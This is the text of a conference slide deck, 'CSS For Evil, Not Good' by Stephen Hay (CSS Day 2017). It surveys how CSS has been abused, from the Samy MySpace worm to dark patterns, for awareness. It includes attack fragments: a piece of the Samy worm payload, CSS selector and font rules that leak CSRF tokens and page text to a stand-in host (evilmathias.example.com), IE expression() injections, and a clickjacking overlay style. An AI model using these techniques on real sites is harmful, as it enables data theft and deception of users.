CSS For Good, Not Evil

CSS For Evil, Not Good. How style has been used
to manipulate people, invade their privacy, steal their data, and other assorted nasty things. Stephen Hay, CSS Day 2017, Amsterdam

catawiki.com/jobs

MySpace

In a relationship.

In a relationship. hot

but most of all, Samy is   my hero By
vissago / Dan Tentler - http://www.ﬂickr.com/photos/vissago/4861025347/, CC BY 2.0, https://commons.wikimedia.org/w/index.php?curid=26085303

<div id=mycode style="BACKGROUND: url('javascript:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34); …” </div> https://samy.pl/popular/tech.html http://www.securiteam.com/securitynews/6I00C2KEAA.html

WTF https://motherboard.vice.com/en_us/article/the-myspace-worm-that-changed-the-internet-forever

Samy didn’t have   evil intentions.

I’m not a security expert.

There are diﬀerent levels of evil.

Level 1: Getting some   browsing history.

weirdbutdead.com

weirdbutdead.com getComputedStyle

Boolean algebra & mix-blend-mode

http://lcamtuf.coredump.cx/whack/ http://lcamtuf.coredump.cx/css_calc/

Level 2 Mathias Bynens’ Evil Basement of Horrors

Some Belgian kid   did a presentation… https://speakerdeck.com/mathiasbynens/3-dot-14-things-i-didnt-know-about-css-at-cssconf-dot-asia-2015

Stealing DOM data

<input type="hidden" name="csrf-token" id="csrf" value=“555…"> #csrf[value^="a"] { background: url(//evilmathias.example.com/?v=a); }
#csrf[value^="b"] { background: url(//evilmathias.example.com/?v=b); } etc.

Text-symbol leaking

<div id=“my-dirtiest-secrets"> I think Javascript is OK </div> @font-face {
font-family: evilmathias; src: url(//evilmathias.example.com/?v=A); unicode-range: U+0041; } #my-dirtiest-secrets { font-family: evilmathias; }

Forcing IE=7 Expressions

.foo { width: expression( alert(‘Bad Evil Mathias’) ); } <meta
http-equiv="X-UA-Compatible" content="IE=7"> <iframe src=“https://target.example.com/page- with-css-payload”></iframe>

Level 3 Path-relative   stylesheet import http://blog.portswigger.net/2015/02/prssi.html

http://example.com/posts.php <link href="styles.css" rel="stylesheet" type="text/css" /> Blah blah blah *
{ width: expression( alert( ‘evil’ )) } http://example.com/posts.php/

Level 4 Content replacement

Oops: allow users to add <style>

Allow users to add classes. Oops.

Level 5 UI Redressing “Clickjacking”

.li_style { position: absolute; width: 100%; z-index: 10021; position: fixed;
top: 0; left: 0; width: 100%; height: 100%; padding: 0; overflow-y: scroll; _overflow-y: hidden }

{"content": "<p><a class=\"li_style\" href=\"http://www.example.com\">Example Site</a><img src=\"image.png\"/></p>"} - https://security.linkedin.com/blog-archive#11232015

Level 6 Phishing

https://www.askdavetaylor.com/beware-the-latest-apple-id-phishing-attack/

One thing going for us, at least for now: most
scammers aren’t great designers.

“Good” design works. Even for evil.

Level 7 Dark Patterns Black Hat UX

Sophisticated deceivers seem knowledgable about behaviour as well as technology.

Image: https://www.brignull.com/

“Roach Motel”

Unsubscribe…

Misdirection

Conﬁrmation of   desired behaviour

Yes | No Yes | Not right now Yes |
Maybe later There is a signiﬁcant diﬀerence between these sets of choices.

Exploiting   behavioural patterns

People who stand to gain something from you have motive
to deceive.

Level 8 Command execution   on a target system https://lifepluslinux.blogspot.nl/2017/01/look-before-you-paste-from-website-to.html

When systems become more complex, the number of possible weaknesses
can increase, yet become less apparent.

What’s the  takeaway here? Nothing.

Is there a   positive message? No.

Thank you! @stephenhay Special thanks to Mathias “Evil Belgian Kid”
Bynens

CSS For Good, Not Evil

CSS For Good, Not Evil

More Decks by Stephen Hay

Other Decks in Design

Featured

Transcript